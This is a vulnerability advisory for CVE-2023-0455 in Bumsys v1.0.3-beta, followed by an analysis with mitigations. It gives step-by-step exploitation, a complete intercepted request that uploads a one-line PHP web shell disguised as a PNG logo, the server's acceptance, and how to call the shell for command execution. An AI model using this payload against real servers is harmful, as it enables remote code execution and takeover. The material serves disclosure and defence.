unilogies/bumsys v1.0.3 beta - Unrestricted File Upload

Exploit Author: AFFAN AHMED Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-05-31 
Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455


================================
Steps_TO_Reproduce
================================
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request  and do the below changes .

================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

 test 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>


====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>


====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ


Unilogies/Bumsys v1.0.3-beta: Unrestricted File Upload Vulnerability Exploited via PHP Shell Upload

On January 19, 2023, cybersecurity researcher AFFAN AHMED disclosed a critical vulnerability in Unilogies/Bumsys v1.0.3-beta, a web-based business management system hosted on GitHub. The flaw, designated as CVE-2023-0455, enables unrestricted file uploads—specifically allowing attackers to upload malicious PHP scripts under the guise of image files. This vulnerability presents a severe risk to any deployment of the software, especially in environments where default security measures are not enforced.

Understanding the Vulnerability

The core issue lies in the file upload mechanism for the shop logo in the Settings → Shop List module. The application accepts file uploads without proper validation of file type, extension, or content. Attackers can exploit this by renaming a malicious PHP file to mimic a legitimate image (e.g., profile picture.php), bypassing standard MIME-type checks.

When the upload is intercepted via tools like Burp Suite, the request can be modified to include executable PHP code, as demonstrated in the exploit payload:

This snippet is a minimal web shell that executes system commands passed through the dx parameter. For instance, sending dx=whoami would return the current user identity on the server. This capability allows remote code execution (RCE), effectively giving attackers full control over the underlying server environment.

Attack Scenario: Step-by-Step Exploitation

Exploitation follows a predictable sequence:

  • Target Access: Navigate to https://demo.bumsys.org/settings/shop-list/.
  • Trigger Upload: Click the "Edit Profile" action button and select the "Select Logo" option.
  • Intercept Request: Use Burp Suite to capture the POST request to /xhr/?module=settings&page=updateShop.
  • Modify Payload: Change the filename from a PNG to profile picture.php and inject the PHP shell code.
  • Send Request: Forward the modified request. The server accepts it due to lack of file validation.
  • Execute Command: Access the uploaded file via https://demo.bumsys.org/uploads/profile picture.php?dx=ls to list directory contents.

Why This is a Critical Risk

Unrestricted file uploads are among the most dangerous vulnerabilities in web applications. They enable:

  • Remote Code Execution (RCE): As demonstrated, attackers can execute arbitrary commands on the server.
  • Privilege Escalation: If the web server runs under a privileged user (e.g., root), attackers can gain full system access.
  • Backdoor Persistence: Malicious files can be uploaded and maintained indefinitely, allowing long-term access.
  • Data Exfiltration: Attackers can read sensitive files (e.g., database credentials, configuration files).

Even in demo environments like demo.bumsys.org, this vulnerability exposes the underlying infrastructure to real-world threats. A production deployment without proper security hardening would be highly susceptible to compromise.

Technical Analysis: Burp Suite Request Breakdown

Header Value
Content-Type multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
X-Csrf-Token 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Cookie eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Origin https://demo.bumsys.org

The Content-Type header indicates multipart form data, which is standard for file uploads. However, the absence of file extension validation and content inspection allows malicious payloads to be processed. The X-Csrf-Token and Cookie headers suggest the application uses session-based authentication, but this does not prevent exploitation if the upload mechanism is unprotected.

Security Recommendations & Mitigations

To prevent such vulnerabilities, developers and administrators must implement the following security controls:

  • File Type Validation: Restrict uploads to specific MIME types (e.g., image/png, image/jpeg) and reject any file with .php, .js, or other executable extensions.
  • File Content Inspection: Scan uploaded files for known malicious patterns (e.g., php, exec, system).
  • Upload Directory Permissions: Store uploaded files outside the web root or in a directory with noexec permissions.
  • Use of Safe File Extensions: Rename uploaded files using random identifiers (e.g., upload_12345.png) to avoid predictable paths.
  • Server-Side File Processing: Avoid allowing direct execution of uploaded files. Use a dedicated processing layer instead.

Real-World Implications

Unilogies/Bumsys is a lightweight business management tool intended for small enterprises. Its open-source nature makes it attractive for quick deployment—but also vulnerable to misuse. A compromised instance could lead to:

  • Loss of customer data (e.g., invoices, contact info).
  • Unauthorized financial transactions.
  • Malware propagation across internal networks.
  • Server hijacking for cryptocurrency mining or botnet recruitment.

Given that this vulnerability was tested on XAMPP 8.2.0 on Windows 11, it underscores that even local development environments are not immune. Developers should treat all file upload features as high-risk components.

Conclusion

While Unilogies/Bumsys v1.0.3-beta may serve as a useful prototype, its CVE-2023-0455 flaw highlights a fundamental failure in secure coding practices. Unrestricted file uploads, especially with PHP script injection, represent a classic yet devastating attack vector. This case serves as a cautionary tale: never trust user input, especially when it comes to file uploads.